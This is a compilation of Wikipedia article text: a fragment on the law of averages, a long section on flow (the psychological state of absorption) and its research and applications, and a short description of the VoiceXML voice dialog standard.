Another application of the law of averages is a belief that a sample's behaviour must line up with theexpected valuebased on population statistics. For example, suppose afair coinis flipped 100 times. Using the law of averages, one might predict that there will be 50 heads and 50 tails. While this is the single most likely outcome, there is only an 8% chance of it occurring according toP(X=50∣n=100,p=0.5){\displaystyle P(X=50\mid n=100,p=0.5)}of thebinomial distribution. Predictions based on the law of averages are even less useful if the sampledoes not reflect the population.
In this example, one tries to increase the probability of a rare event occurring at least once by carrying out more trials. For example, a job seeker might argue, "If I send my résumé to enough places, the law of averages says that someone will eventually hire me." Assuming a non-zero probability, it is true that conducting more trials increases the overall likelihood of the desired outcome. However, there is no particular number of trials that guarantees that outcome; rather, the probability that it will already have occurredapproaches but never quite reaches100%.
TheSteve Goodmansong "A Dying Cub Fan's Last Request" mentions the law of averages in reference to theChicago Cubslack of championship success. At the time Goodman recorded the song in 1981, the Cubs had not won aNational Leaguechampionship since1945, and had not won aWorld Seriessince1908. This futility would continue until the Cubs would finally win both in2016.
|
https://en.wikipedia.org/wiki/Law_of_averages
|
Flowinpositive psychology, also known colloquially as beinginthe zoneorlocked in, is themental statein which a person performing some activity is fully immersed in a feeling of energizedfocus, full involvement, and enjoyment in the process of the activity. In essence, flow is characterized by the complete absorption in what one does, and a resulting transformation in one's sense of time.[1]Flow is the melting together of action andconsciousness; the state of finding a balance between a skill and how challenging that task is. It requires a high level of concentration. Flow is used as acopingskill for stress and anxiety when productively pursuing a form of leisure that matches one's skill set.[2]
First presented in the 1975 bookBeyond Boredom and Anxietyby the Hungarian-American psychologistMihály Csíkszentmihályi,[3][4]the concept has been widely referred to across a variety of fields (and is particularly well recognized inoccupational therapy).
The flow state shares many characteristics withhyperfocus.[5]However, hyperfocus is not always described in a positive light. Some examples include spending "too much" time playing video games or becoming pleasurably absorbed by one aspect of an assignment or task to the detriment of the overall assignment. In some cases, hyperfocus can "capture" a person, perhaps causing them to appear unfocused or to start severalprojects, but complete few. Hyperfocus is often mentioned "in the context ofautism,schizophrenia, andattention deficit hyperactivity disorder– conditions that have consequences on attentional abilities."[5]
Flow is an individual experience and the idea behind flow originated from thesports-psychologytheory about an Individual Zone of Optimal Functioning. The individuality of the concept of flow suggests that each person has their subjective area of flow, where they would function best given the situation. One is most likely to experience flow at moderate levels of psychologicalarousal, as one is unlikely to be overwhelmed, but not understimulated to the point of boredom.[6]
Flow is so named because, during Csíkszentmihályi's 1975 interviews, several people described their "flow" experiences using the metaphor of a water current carrying them along:
We have called this state the flow experience, because this is the term many of the people we interviewed had used in their descriptions of how it felt to be in top form: "It was like floating," "I was carried on by the flow."
Mihaly Csikszentmihályiand others began researching flow after Csikszentmihályi became fascinated by artists who would essentially get lost in their work.[8]Artists, especially painters, got so immersed in their work that they would disregard their need for food, water and even sleep. The theory of flow came about when Csikszentmihályi tried to understand the phenomenon experienced by these artists. Flow research became prevalent in the 1980s and 1990s, with Csikszentmihályi and his colleagues in Italy still at the forefront. Researchers grew interested in optimal experiences and emphasizing positive experiences, especially in places such as schools and the business world.[9]They also began studying the theory of flow at this time.[10]
The cognitive science of flow has been studied under the rubric of effortless attention.[11]
Jeanne Nakamura and Csíkszentmihályi identify the following six factors as encompassing an experience of flow:[10]
Those aspects can appear independently of each other, but only in combination do they constitute a so-calledflow experience. Additionally, psychology writer Kendra Cherry has mentioned three other components that Csíkszentmihályi lists as being a part of the flow experience:[12]
Just as with the conditions listed above, these conditions can be independent of one another.
In 2021, Cameron Norsworthy and colleagues aimed to address the inconsistencies and concerns of many of the flow-related models and studies, and proposed a framework that differentiated the flow antecedents and experiential dimensions.[13]Norsworthy et al identified a core experience of flow including overarching antecedent constructs:
And recurring characteristics of the flow experience itself included:
The proposed definition of flow: Flow is an intrinsically rewarding state of absorption in a task in which a high degree of control feels more effort-less than normal.
In any given moment, a great deal of information is made available to each individual. Psychologists have found that one's mind can attend to only a certain amount of information at a time. According to Csikszentmihályi's 2004TEDtalk, that number is about "110bits of information per second."[14]That may seem like a lot of information, but simple daily tasks take quite a lot of information. Just decoding speech takes about 40–60 bits of information per second,[15]which is why when having a conversation, one cannot focus as muchattentionon other things.[16]
Generally, people have the ability to decide what they will give their full attention to. This excludes basic distinctive feelings, such as hunger and pain. However, when one is in the flow state, they are completely engrossed with the one task at hand and, without making the conscious decision to do so, lose awareness of all other things: time, people, distractions, and even basic bodily needs.[17][18]According to Csikszentmihályi, this event occurs because all of the attention of the person in the flow state is on the task at hand; there is no more attention to be allocated.[19]
The flow state has been described by Csikszentmihályi as the "optimal experience" in that one gets to a level of high gratification from the experience.[20]Achieving this experience is considered to be personal and "depends on the ability" of the individual.[20]One's capacity and desire to overcome challenges in order to achieve their ultimate goals leads not only to the optimal experience but also to a sense oflife satisfactionoverall.[20]
Despite the attraction of flow and the varying flow interventions (e.g., mindfulness, goal-setting, visualisation) there has existed no gold standard intervention to promote flow experiences. Recently, Norsworthy et al. found continued evidence that it may be possible to ‘train’ flow through an educational intervention of flow.[21][22]
There are three common ways to measure flow experiences: the flow questionnaire (FQ), the experience sampling method (ESM), and the "standardized scales of the componential approach."[23]
The FQ requires individuals to identify definitions of flow and situations in which they believe that they have experienced flow, followed by a section that asks them to evaluate their personal experiences in these flow-inducing situations. The FQ identifies flow as multiple constructs, therefore allowing the results to be used to estimate differences in the likelihood of experiencing flow across a variety of factors. Another strength of the FQ is that it does not assume that everyone's flow experiences are the same. Because of this, the FQ is the ideal measure for estimating the prevalence of flow.[24]However, the FQ has some weaknesses that more recent methods have set out to address. The FQ does not allow for a measurement of the intensity of flow during specific activities. This method also does not measure the influence of the ratio of challenge to skill on the flow state.[23]
The ESM requires individuals to fill out the experience sampling form (ESF) at eight randomly chosen time intervals throughout the day. The purpose of this is to understand subjective experiences by estimating the time intervals that individuals spend in specific states during everyday life. The ESF is made up of 13 categorical items and 29 scaled items. The purpose of the categorical items is to determine the context andmotivationalaspects of the current actions (these items include: time, location, companionship/desire for companionship, activity being performed, reason for performing activity). Because these areopen-ended questions, the answers need to be coded by researchers. This needs to be done carefully so as to avoid any biases in the statistical analysis. The scaled items are intended to measure the levels of a variety of subjective feelings that the individual may be experiencing. The ESM is more complex than the FQ and contributes to the understanding of how flow plays out in a variety of situations, however the possible biases make it a risky choice.[23]
Some researchers are not satisfied with the methods mentioned above and have set out to create their own scales. The scales developed by Jackson and Eklund are the most commonly used in research. Mainly because they are still consistent with Csíkszentmihályi's definition of flow and consider flow as being both a state and a trait. Jackson and Eklund created two scales that have been proven to be psychometrically valid and reliable: the flow state scale-2 (which measures flow as a state), and the dispositional flow scale-2 (designed to measure flow as either a general trait or domain-specific trait). The statistical analysis of the individual results from these scales gives a much more complete understanding of flow than the ESM and the FQ.[23]More recently, the Psychological Flow Scale (PFS) that was designed to be utilized across domains and scientific disciplines so future flow research could be compatible and comparable was validated. It offers a parsimonious model of flow that assesses the core aspects of the flow state.[25]
The flow state can be entered while performing any activity; however, it is more likely to occur when the task or activity is wholeheartedly engaged forintrinsic purposes.[19][27]Passive activities such as taking a bath or even watching TV, usually do not elicit a flow experience because active engagement is prerequisite to entering the flow state.[28][29]While the activities that induce flow vary and may be multifaceted, Csikszentmihályi asserts that the experience of flow is similar whatever the activity.[30]
Flow theory postulates that three conditions must be met to achieve flow:
It has been argued that the antecedent factors of flow are interrelated, and as such, a balance between perceived challenges and skills requires that the goals are clear and feedback is effective. Thus, such balance can be identified as the central precondition of flow experience.[32]
In 1987, Massimini, Csíkszentmihályi and Carli published the eight-channel model of flow.[33]Antonella Delle Fave, who worked with Fausto Massimini at the University of Milan, calls this graph the Experience Fluctuation Model.[34]The model depicts the channels of experience that result from different levels of perceived challenges and perceived skills. The graph illustrates another aspect of flow: it is more likely to occur when the activity is a higher-than-average challenge (above the center point) and the individual has above-average skills (to the right of the center point).[19]The center of the graph where the sectors meet represents the average level of challenge and skill across all individual daily activities. The further from the center an experience is, the greater the intensity of that state of being, whether it is flow or anxiety or boredom or relaxation.[27]
Several problems of the model have been discussed in literature.[32][35]One is that it does not ensure the perceived balance between challenges and skills which is said to be the central precondition of flow experience. Individuals with a low average level of skills and a high average level of challenges, (or the converse) do not necessarily experience a match between skills and challenges when both are above their individual average.[36]Another study found that low challenge situations which were surpassed by skill were associated with enjoyment, relaxation, and happiness, which, they claim, is contrary to flow theory.[37]
Schaffer (2013) proposed seven flow conditions:
Schaffer published a flow condition questionnaire (FCQ), to measure each of these seven flow conditions for any given task or activity.[38]
Some of the challenges to staying in flow include states ofapathy,boredom, andanxiety. The state of apathy is characterized by easy challenges and low skill level requirements, resulting in a general lack of interest in the activity. Boredom is a slightly different state that occurs when challenges are few, but one's skill level exceeds those challenges causing one to seek higher challenges. A state of anxiety occurs when challenges are high enough to exceed perceived skill level, causing distress and uneasiness. These states in general prevent achieving the balance necessary for flow.[39]Csíkszentmihályi has said, "If challenges are too low, one gets back to flow by increasing them. If challenges are too great, one can return to the flow state by learning new skills."[12]
Csíkszentmihályi hypothesized that people with certain personality traits may be better able to achieve flow than the average person. These traits include curiosity, persistence, low egotism, and a high propensity to perform activities for intrinsic reasons. People with most of these personality traits are said to have anautotelicpersonality, i.e. a disposition to actively seek challenges and flow experiences.[27][40]The term "autotelic" derives from twoGreekwords,autos("self") andtelos("end" or "goal").
There is scant research on theautotelic personality, but results of the few studies that have been conducted suggest that indeed some people are more likely to experience flow than others. One researcher (Abuhamdeh, 2000) found that people with an autotelic personality have a greater preference for "high-action-opportunity, high-skills situations that stimulate them and encourage growth" compared to those without an autotelic personality.[27]It is in such high-challenge, high-skills situations that people are most likely to experience flow.
Experimental evidence shows that a balance between individual skills and demands of the task (compared to boredom and overload) only elicits the flow experience in individuals having an internallocus of control[41]or a habitual action orientation.[42]Several correlational studies foundneed for achievementto be a personal characteristic that fosters flow experiences.[43][44][45]
Autotelic Personality also has been shown in studies to correlate and show overlapping of flow in personal life and theBig Five Personality Traitsof Extraversion, Agreeableness, Conscientiousness, Neuroticism, and Openness to Experience. More particularly the traits of agreeableness and extraversion. Study of Autotelic Personality is difficult as most studies are performed through self-evaluation, as an Autotelic Personality is difficult to observe.[46][47]
More than one type of flow exists. Group flow (orteam flow) is notably different from independent flow, as it is inherently mutual. Group flow is attainable when the performance unit is a group, such as a team or musical group. When groups cooperate to agree on goals and patterns, social flow, commonly known as group cohesion, is much more likely to occur. If a group still has not entered flow, a team-level challenge may stimulate the group to harmonize.[48]Group flow is different from synchronized solitary flow, in which a group is simultaneously experiencing individual flow. Group Flow occurs in an interpersonal manner, in which the act of others being present is inherent to the cause of the state of flow.[49]
In research presented in a review written by PLoS ONE,[49]it is stated, "Group contexts introduce many additional variables that cause individuals to act, think, and feel differently during group situations compared to solitary situations." Due to these additional variables, the cause and effect of flow are vastly different and unique to the experience of individual flow, hence providing evidence for the existence of a separate flow state: group flow.
Snijdewint[50]studies the correlation of the physiological effect of a group that simultaneously reports a "flow" state. This research concludes that between many similar studies when a participant reports a feeling of flow state (in synchronization or due to a group environment), there are similarities in the cardiovascular triggers[51]that the participant's experience.
Only Csíkszentmihályi seems to have published suggestions forextrinsicapplications of the flow concept, such asdesignmethods for playgrounds to elicit the flow experience. Other practitioners of Csíkszentmihályi's flow concept focus onintrinsicapplications, such asspirituality,performance improvement, orself-help.
Flow state theory suggests that when individuals are in a state of flow, they experience deep immersion, focus, and intrinsic motivation in their activities.[52]In the context of education, flow has been associated with increased student engagement, which is a key determinant of learning success.
Numerous studies have examined the relationship between flow and student engagement, demonstrating positive associations. For example, Csikszentmihalyi and Larson (1984) found that students who reported experiencing flow during their academic tasks exhibited higher levels of engagement, concentration, and enjoyment. Similarly, Cho and Lee (2017) discovered that flow experiences positively correlated with student engagement in a college classroom setting.[53]
Flow state research has also explored its impact on learning outcomes, such asknowledge acquisition, skill development, and creativity. When students are in a state of flow, they are more likely to experience a heightened sense of focus, concentration, andintrinsic motivation, which can lead to improvedlearning outcomes.[54]
Studies have shown that flow experiences can enhance cognitive processes related to learning. For instance, Schüler and Brunner (2009) found that university students who reported being in a state of flow while studying demonstrated betterinformation recallandproblem-solving abilities. In addition, studies by Simons and Dewitte (2004) and Jackson and Csikszentmihalyi (1999) revealed that flow experiences positively influenced creativity and innovation among students.[citation needed]
The concept of flow has been applied to various educational settings and practices, offering valuable insights for teaching and learning. Here are a few notable applications:
These applications demonstrate the potential benefits of integrating flow state theory into educational practices. However, further research is needed to explore the specific strategies andinterventionsthat effectively foster flow in educational settings.
Ineducation, the concept ofoverlearningplays a role in a student's ability to achieve flow. Csíkszentmihályi[20]states that overlearning enables the mind to concentrate on visualizing the desired performance as a singular, integrated action instead of a set of actions. Challenging assignments that (slightly) stretch one's skills lead to flow.[59]
In the 1950s British cybernetician Gordon Pask designed an adaptive teaching machine called SAKI, an early example of "e-learning". The machine is discussed in some detail in Stafford Beer's book "Cybernetics and Management".[60]In the patent application for SAKI (1956),[61]Pask's comments (some of which are included below) indicate an awareness of the pedagogical importance of balancing student competence with didactic challenge, which is quite consistent with flow theory:
If the operator is receiving data at too slow a rate, he is likely to become bored and attend to other irrelevant data.
If the data given indicates too precisely what responses the operator is required to make, the skill becomes too easy to perform and the operator again tends to become bored.
If the data given is too complicated or is given at too great a rate, the operator is unable to deal with it. He is then liable to become discouraged and lose interest in performing or learning the skill.
Ideally, for an operator to perform a skill efficiently, the data presented to him should always be of sufficient complexity to maintain his interest and maintain a competitive situation, but not so complex as to discourage the operator. Similarly these conditions should obtain at each stage of a learning process if it is to be efficient. A tutor teaching one pupil seeks to maintain just these conditions.
Around 2000, it came to the attention of Csíkszentmihályi that the principles and practices of theMontessori Methodof education, seemed to purposefully set up continuous flow opportunities and experiences for students. Csíkszentmihályi and psychologist Kevin Rathunde embarked on a multi-year study of student experiences in Montessori settings and traditional educational settings. The research supported observations that students achieved flow experiences more frequently in Montessori settings.[62][63][64]
Musicians, especiallyimprovisationalsoloists, may experience a state of flow while playing their instrument.[65]Research has shown that performers in a flow state have a heightened quality of performance as opposed to when they are not in a flow state.[66]In a study performed with professional classical pianists who played piano pieces several times to induce a flow state, a significant relationship was found between the flow state of the pianist and the pianist's heart rate, blood pressure, and major facial muscles. As the pianist entered the flow state, heart rate and blood pressure decreased, and the major facial muscles relaxed. This study further emphasized that flow is a state of effortless attention. In spite of the effortless attention and overall relaxation of the body, the performance of the pianist during the flow state improved.[67]
Groups of drummers go through a state of flow when they sense a collective energy that drives the beat, something they refer to asgetting into the grooveorentrainment. Likewise, drummers and bass guitarists often describe a state of flow when they are feeling the downbeat together as beingin the pocket.[68]Researchers have measured flow through subscales; challenge-skill balance, merging of action and awareness, clear goals, unambiguous feedback, total concentration, sense of control, loss of self-consciousness, transformation of time and autotelic experience.[69]
The concept ofbeing in the zoneduring an athletic performance fit within Csíkszentmihályi's description of the flow experience. Theories and applications ofbeing in the zoneand its relationship with an athletic competitive advantage are topics studied in the field ofsport psychology.[70]In a qualitative study of NCAA Division I athletes on the experience of flow, 94% of the athletes described flow state as causing a merging of action and awareness, and that it was effortless and automatic.[71]
Timothy Gallwey's influential works on the "inner game" of sports, such asgolfandtennis, described the mental coaching and attitudes required to "get in the zone" and fully internalize mastery of the sport.[72]
Roy Palmer suggests that "being in the zone" may also influence movement patterns as better integration of the conscious and subconscious reflex functions improves coordination. Many athletes describe the effortless nature of their performance while achieving personal bests.[73][74][75]
Manymartial artssuch as Japanesebudōcontain aspects of psychological flow.[76]Mixed martial artschampion andKaratemasterLyoto Machidauses meditation techniques before fights to attainmushin, a concept that, by his description, is in all respects equal to flow.
TheFormula OnedriverAyrton Senna, during qualifying for the1988 Monaco Grand Prix, explained: "I was already on pole, [...] and I just kept going. Suddenly I was nearly two seconds faster than anybody else, including my team mate with the same car. And suddenly I realised that I was no longer driving the car consciously. I was driving it by a kind of instinct, only I was in a different dimension. It was like I was in a tunnel."[77]
Former500 GPriderWayne Gardnertalking about his victory at the1990 Australian Grand PrixonThe Unrideables 2documentary said: "During these last five laps I had this sort of above body experience where actually raised up above and I could see myself racing. It was kind of a remote control and it's the weirdest thing I've ever had in my life. [...]" After the raceMick [Doohan]and in factWayne Raineysaid: "How the hell did you do that?" and I said: "I have no idea."[78]
Inyogictraditions such asRaja Yoga, reference is made to a state offlow[79]in the practice ofSamyama, a psychological absorption in the object of meditation.[80]
Flow ingamesand gaming has been linked to thelaws of learningas a part of the explanation for why learning-games (the use of games to introduce material, improve understanding, or increase retention) have the potential to be effective.[81][failed verification]In particular, flow is intrinsically motivating, which is a part of the law of readiness. The condition of feedback, required for flow, is associated with the feedback aspects of the law of exercise. This is exhibited in well designed games, in particular, where players perform at the edge of their competency as they are guided by clear goals and feedback.[82]The positive emotions associated with flow are associated with the law of effect. The intense experiences of being in a state of flow are directly associated with the law of intensity. Thus, the experience of gaming can be so engaging and motivating as it meets many of the laws of learning, which are inextricably connected to creating flow.
In games often much can be achieved thematically through an imbalance between challenge level and skill level. Horror games often keep challenges significantly above the player's level of competency in order to foster a continual feeling of anxiety. Conversely, so called "relaxation games" keep the level of challenges significantly below the player's competency level, in order to achieve an opposite effect.[83]The video gameFlowwas designed as part ofJenova Chen's master's thesis for exploring the design decisions that allow players to achieve the flow state, by adjusting the difficulty dynamically during play.[84]
It improves performance; calling the phenomenon "TV trance," a 1981BYTEarticle discussed how "the best seem to enter a trance where they play but don't pay attention to the details of the game."[85]The primary goal of games is to create entertainment throughintrinsic motivation, which is related to flow; that is, without intrinsic motivation it is virtually impossible to establish flow.[86]Through the balance of skill and challenge, the player's brain is aroused, with attention engaged and motivation high.[82]Thus, the use of flow in games helps foster an enjoyable experience, which in turn increases motivation and draws players to continue playing. As such, game designers strive to integrate flow principles into their projects.[87]Overall, the experience of play is fluid and is intrinsically psychologically rewarding independent of scores or in-game successes in the flow state.[82]
A simplified modification to flow has been combined with thetechnology acceptance model(TAM) to help guide the design of and explain the adoption of intrinsically motivated computer systems. This model, the hedonic-motivation system adoption model (HMSAM) is modelled to improve the understanding of hedonic-motivation systems (HMS) adoption.[86]HMS are systems used primarily to fulfill users' intrinsic motivations, such for online gaming, virtual worlds, online shopping, learning/education, online dating, digital music repositories, social networking, online pornography, gamified systems, and for general gamification. Instead of a minor, TAM extension, HMSAM is an HMS-specific system acceptance model based on an alternative theoretical perspective, which is in turn grounded in flow-based concept of cognitive absorption (CA). The HMSAM further builds on van der Heijden's (2004) model of hedonic system adoption[88]by including CA as a key mediator of perceived ease of use (PEOU) and of behavioral intentions to use (BIU) hedonic-motivation systems. Typically, models simplistically represent "intrinsic motivations" by mere perceived enjoyed. Instead, HMSAM uses the more complex, rich construct of CA, which includes joy, control, curiosity, focused immersion, and temporal dissociation. CA is a construct grounded in the seminal flow literature, yet CA has traditionally been used as a static construct, as if all five of its subconstructs occur at the same time—in direct contradiction to the flow literature. Thus, part of HMSAM's contribution is to return CA closer to its flow roots by re-ordering these CA subconstructs into more natural process-variance order as predicted by flow. Empirical data collection along with mediation tests further support this modeling approach.
Conditions of flow, defined as a state in which challenges and skills are equally matched, play an important role in the workplace.[89]Because flow is associated with achievement, its development may have specific implications for increased workplace satisfaction and achievement. Flow researchers, such as Csikszentmihályi, believe that certain interventions may be performed to enhance and increase flow in the workplace, through which people would gain 'intrinsic rewards that encourage persistence" and provide benefits. In his consultation work, Csikszentmihályi emphasizes finding activities and environments that are conducive to flow, and then identifying and developing personal characteristics to increase experiences of flow. Applying these methods in the workplace can improve morale by fostering a sense of greater happiness and accomplishment, which may be correlated with increased performance. In his review of Mihály Csikszentmihályi's book "Good Business: Leadership, Flow, and the Making of Meaning," Coert Visser introduces the ideas presented by Csikszentmihályi, including "good work" in which one "enjoys doing your best while at the same time contributing to something beyond yourself."[90]He then provides tools by which managers and employees can create an atmosphere that encourages good work. Some consultants suggest that the experience sampling form (EMS) method be used for individuals and teams in the workplace in order to identify how time is currently being spent, and where focus should be redirected to in order to maximize flow experiences.[91]
In order to achieve flow, Csikszentmihályi lays out the following three conditions:
Csikszentmihályi argues that with increased experiences of flow, people experience "growth towards complexity". People flourish as their achievements grow and with that comes development of increasing "emotional, cognitive, and social complexity."[90]Creating a workplace atmosphere that allows for flow and growth, Csikszentmihályi argues, can increase the happiness and achievement of employees. An increasingly popular way of promoting greater flow in the workplace is using the "serious play" facilitation methods.[citation needed]
In the study "Predicting flow at work: Investigating the activities and job characteristics that predict flow states at work", Karina Nielsen and Bryan Cleal used a 9-item flow scale to examine predictors of flow at two levels: activity level (such as brainstorming, problem solving, and evaluation) and at a more stable level (such as role clarity, influence, and cognitive demands). They found that activities such as planning, problem solving, and evaluation predicted transient flow states, but that more stable job characteristics were not found to predict flow at work. This study can help us identify which task at work can be cultivated and emphasized in order to help employees experience flow on the job.[92]In her article inPositive Psychology News Daily, Kathryn Britton examines the importance of experiencing flow in the workplace beyond the individual benefits it creates. She writes, "Flow isn't just valuable to individuals; it also contributes to organizational goals. For example, frequent experiences of flow at work lead to higher productivity, innovation, and employee development (Csikszentmihályi, 1991, 2004). So finding ways to increase the frequency of flow experiences can be one way for people to work together to increase the effectiveness of their workplaces."[93]
Books by Csikszentmihályi suggest that enhancing the time spent in flow makes our lives more happy and successful. Flow experiences are predicted to lead to positive affect as well as to better performance.[20][94]For example, delinquent behavior was reduced in adolescents after two years of enhancing flow through activities.[39]
People who have experienced flow, describe the following feeling:
However, further empirical evidence is required[according to whom?]to substantiate these preliminary indications, as flow researchers continue to explore the problem of how to directly investigate causal consequences of flow experiences using modern scientific instrumentation to observe the neuro-physiological correlates of the flow state.[96]
Flow is an innately positive experience known to "produce intense feelings of enjoyment".[19]An experience that is so enjoyable should lead to positiveaffectandhappinessin the long run. Also, Csikszentmihályi stated that happiness is derived from personal development and growth– and flow situations permit the experience of personal development.[94]
Several studies found that flow experiences and positive affect go hand in hand,[44][97]and that challenges and skills above the individual's average foster positive affect.[98][99][100]However, the causal processes underlying those relationships remain unclear at present.
Flow experiences imply a growth principle. When one is in a flow state, they are working to master the activity at hand. To maintain that flow state, one must seek increasingly greater challenges. Attempting these new, difficult challenges stretches one's skills. One emerges from such a flow experience with a bit of personal growth and great "feelings of competence and efficacy".[31]By increasing time spent in flow, intrinsic motivation and self-directed learning also increases.[101]
Flow has a documented correlation with high performance in the fields of artistic and scientific creativity,[102][103]teaching,[94]learning,[104]and sports;[105][106]Looking at the sports side of being in a Flow State to help in learning different techniques, there has been research conducted by Alexandria University, Alexandria, Egypt. Their research revolved around tennis and field hockey players, specifically 24 students who are novices in the respective sports and were between the ages 19-20 years old.[107]The experiment itself consisted of putting a group of students learning the sports through the process of mental training. The participants do this by watching the clips of athletes in slow motion.[107]They did this over the course of 16 sessions with it being split in 8 sessions for each of the sports being tested.[107]These sessions also lasted for 40 minutes 3 times a week, alternating sports every session.[107]Overall the reliability of the experiment was shown to be very good. The results of the experiment also indicated that the participants were in fact able to preform at a higher level than if they didn't do the mental training/relaxation.[107]Specifically looking at the forehand, backhand in tennis and push pass in field hockey, there was a spike in performance.[107]
Flow has been linked to persistence and achievement in activities while also helping to lower anxiety during various activities and raise self-esteem.[39]An article that was produced by José A. Domínguez-González, Rafael E. Reigal, Verónica Morales-Sánchez and Antonio Hernández-Mendo at the University of Málaga, in Spain show more benefits to using flow state in young football (soccer) players. The experiment was to show if there was a "correlation between sports psychological profile, competitive anxiety, self-confidence and the flow state."[108]Their sample was 328 people that were split into 2 different groups.[108]The first group contained 172 people and the second group contained 156 people.[108]The mean ages of group 1 was 14.72 and 17.11 for group 2. The first group also had higher status in different leagues for certain sports while the second group had many lower league status.[108]The experiment was questionnaire based and was used to determine whether there was a correlation between sports psychological profile, competitive anxiety, self-confidence and the flow state.[108]The conclusion was that athletes with high skill had less anxiety and higher sports psychological profile, self-confidence and the flow state on average than the athletes in lower leagues of football(soccer).[108]It also shows the positive correlation between psychological sports profile to self-confidence and the flow state.[108]While also showing the negative correlation between competitive anxiety to psychological sports profile, self confidence, and the flow state.[108]
However, evidence regarding better performance in flow situations is mixed.[96]For sure, the association between the two is a reciprocal one. That is, flow experiences may foster better performance but, on the other hand, good performance makes flow experiences more likely. Results of a longitudinal study in the academic context indicate that the causal effect of flow on performance is only of small magnitude and the strong relationship between the two is driven by an effect of performance on flow.[43]In the long run, flow experiences in a specific activity may lead to higher performance in that activity as flow is positively correlated with a higher subsequent motivation to perform and to perform well.[31]
Research on flow experiences is well established, however there are still unresolved, critical issues with the universal definitions and measurements associated with the concept.[109]In recent years, the language, definitions, measurement approaches, and models of flow state in the research community continually increased. A comprehensive review of flow state studies conducted from 2012 to 2019 took one of the first steps towards determining a potential universalization of terminology for future use in research of flow.[110]Despite the varied approaches to flow evident in this review, a common set of overarching antecedent constructs included “optimal challenge” and “high motivation,” and recurring characteristics of the flow experience itself included “absorption,” “effort-less control,” and “intrinsic reward.” By separating the antecedents of flow from the experience of flow itself, and utilising a language accessible to all scientific disciplines, Norsworthy et al.'s three dimensonal conceptualsiation of flow offers a contemporary framework that can be used for the study of flow across scientific disciplines.
Psychological flow state research has made significant strides in understanding the concept and its implications. However, like any scientific field, it is not without itscriticismsand areas that require further investigation.
This section explores the criticisms of flow state research and highlights the potential directions for future research.
The lack of standardized definitions, measurement approaches, and terminologies hampers the cumulative progress of flow state research and poses challenges in synthesizing and comparing findings across studies.[113]It also limits the development of comprehensivetheoretical modelsthat can encompass the complexity and nuances of flow experiences. Addressing these critical issues is essential to enhance the scientific rigor andvalidityof flow state research, enabling a deeper understanding of this intriguing psychological phenomenon. Despite these criticisms and challenges, the study of flow states continues to evolve and expand. Researchers are actively working towards refining the conceptualization, measurement, and theoretical frameworks of flow. Through ongoing efforts to establish consensus and develop standardized guidelines, the field aims to overcome these limitations, paving the way for more robust and comprehensive investigations into the nature and significance of psychological flow states.[114]
Csikszentmihályi writes about the dangers of flow himself:
...enjoyable activities that produce flow have a potentially negative effect: while they are capable of improving the quality of existence by creating order in the mind, they can become addictive, at which point the self becomes captive of a certain kind of order, and is then unwilling to cope with the ambiguities of life.
Further, he writes:
The flow experience, like everything else, is not "good" in an absolute sense. It is good only in that it has the potential to make life more rich, intense, and meaningful; it is good because it increases the strengths and complexity of the self. But whether the consequence of any particular instance of flow is good in a larger sense needs to be discussed and evaluated in terms of more inclusive social criteria.[115]
Keller and Landhäußer (2012, p. 56) advocate for a flow intensity model because many models of flow have trouble predicting the intensity of flow experiences that can occur under various circumstances where skill and task demands fit together to produce flow.[32]
Cowley et al. found that because self-reported flow happens after-the-fact, it does not really capture the aspect of flow that happens in the moment. Furthermore, that aspect of flow is prone to change, so the self-reported experience of flow cannot be trusted as much.[116]
Cameron et al. found that there is not a lot of information on group flow, and this may be hindering development in managerial and theoretical contributions.[117]
Goddard et al. found that interventions such as hypnosis, mindfulness, and imagery were found to be unsuccessful in stimulating flow experiences in individuals; however, these strategies were found to increase the state of flow.[118]
Braxton Soderman's 2021 monographAgainst Flow: Video Games and the Flowing Subjectpoints out that flow exists on ideological grounds as an individualist counterpoint to socialism. Furthermore, the application of flow via gamification has brought work and play into ever closer relationship. Play is, therefore, converted into a form of unpaid labor.[119]
Norsworthy et al. proposed a parsimonious model of three core dimensions of flow, reflecting the findings from the largest review on flow science to date, synthesising flow research across scientific disciplines and addressing conceptual criticisms of flow science regarding construct validity, theoretical compatibility, relational ambiguity, and definitional inconsistency. A new Psychological Flow Scale (PFS) to measure the core aspects of the flow state that could be utilized across domains and scientific disciplines was validated.[120]
In a global context, there is a gap in understanding how flow manifests within various socio-cultural contexts. Cross-cultural comparative studies, as suggested by Engeser and Rheinberg (2008), could delve into how flow experiences differ across societies, deepening our understanding of the concept's universality or cultural specificity.[121]
Longitudinal studies, capable of tracking flow experiences over extended periods, could offer insights into the sustained effects of flow on personal development, well-being, and performance. As Seligman and Csikszentmihalyi (2000) have suggested, such research could offer a more nuanced understanding of the concept's long-term impact.[122]
The impact of technological advancements on flow experiences represents another noteworthy research direction. As digital technology increasingly permeates our lives, exploring how immersive technologies such as virtual reality or augmented reality facilitate or hinder flow states could be an enlightening line of study. The potential of such research has been discussed by Csikszentmihalyi and Csikszentmihalyi (2014), emphasizing the need to understand how digital distractions may disrupt flow and how these effects could be mitigated. Another critical avenue for future research is the role of flow in online learning. The rise of digital education platforms, as discussed by Csíkszentmihályi and Nakamura (2018), necessitates investigations into how flow can be fostered in these contexts and how it might influence learning outcomes.[123]
The neuroscientific underpinnings of flow are a developing field with significant potential. With advancements in neuroimaging technologies, as highlighted by Linden (2021), the opportunity to correlate psychological experiences of flow with their physiological counterparts becomes increasingly feasible.[124]
Additional research into how flow impacts ethical decision-making across professional fields could have extensive implications. An exploratory study by Nielsen and Cleal (2010) hints at the potential role of flow in influencing ethical judgments, suggesting the necessity more extensive research in this domain.[125]
Cameron et al. proposed a research program that focuses on how group flow is different from individual flow, and how group flow affects group performance. These ideas will address some of the issues in group flow research such as poor data collection and interpretation.[126]Sridhar & Lyngdoh suggested that research should investigate how mobility affects the ethical performance of sales professionals. Furthermore, there should be longitudinal studies done in various fields to understand the ethical implications of flow in sales.[127]
|
https://en.wikipedia.org/wiki/Flow_(psychology)
|
VoiceXML(VXML) is a digital document standard for specifying interactive media and voice dialogs between humans and computers. It is used for developing audio and voice response applications, such as banking systems and automated customer service portals. VoiceXML applications are developed and deployed in a manner analogous to how aweb browserinterprets and visually renders theHypertext Markup Language(HTML) it receives from aweb server. VoiceXML documents are interpreted by avoice browserand in common deployment architectures, users interact with voice browsers via thepublic switched telephone network(PSTN).
The VoiceXML document format is based onExtensible Markup Language(XML). It is a standard developed by theWorld Wide Web Consortium(W3C).
VoiceXML applications are commonly used in many industries and segments of commerce. These applications include order inquiry, package tracking, driving directions, emergency notification, wake-up, flight tracking, voice access to email, customer relationship management, prescription refilling, audio news magazines, voice dialing, real-estate information and nationaldirectory assistanceapplications.[citation needed]
